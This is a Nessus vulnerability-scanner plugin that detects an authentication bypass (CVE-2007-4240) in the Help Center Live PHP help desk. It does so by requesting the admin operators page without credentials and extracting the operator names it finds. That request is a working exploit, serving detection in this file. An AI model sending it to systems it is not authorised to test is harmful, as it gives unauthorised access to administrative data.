#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
authentication bypass issues. 

Description :

The remote host is running Help Center Live, an open-source, web-based
help desk application written in PHP. 

The version of Help Center Live installed on the remote host has
several administrative scripts that fail to exit if called without
valid credentials.  An unauthenticated attacker may be able to exploit
this design flaw to gain administrative control of the application. 

Solution :

Unknown at this time. 

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25898);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-4240");
  script_bugtraq_id(25225);
  script_xref(name:"OSVDB", value:"39400");

  script_name(english:"Help Center Live Admin Authentication Bypass Vulnerabilities");
  script_summary(english:"Tries to get a list of all operators");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/helpcenterlive", "/hcl", "/helpcenter", "/live", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to get a list of operators.
  req = http_get(item:string(dir, "/admin/operators.php?view"), port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  # If...
  if (
    # we got a list of operators and...
    "<h2>Operators</h2>" >< res &&
    # we're redirected to the login page
    egrep(pattern:string("^Location: .+", dir, "/admin/index.php"), string:res)
  )
  {
    # Grab the list of operators for the report.
    operators = "";
    table = strstr(res, "<h2>Operators</h2>");
    table = table - strstr(table, "</table");

    pat = "<td>.+\(([^)]+)\)</td";
    matches = egrep(pattern:pat, string:table);
    if (matches)
    {
      foreach match (split(matches))
      {
        match = chomp(match);
        item = eregmatch(pattern:pat, string:match);
        if (!isnull(item)) operators += '  ' + item[1] + '\n';
      }
    }

    if (operators)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Nessus was able to exploit the issue to obtain the following list of\n",
        "operators on the remote host :\n",
        "\n",
        operators
      );
    }
    else report = desc;

    security_hole(port:port, data:report);
    exit(0);
  }
}
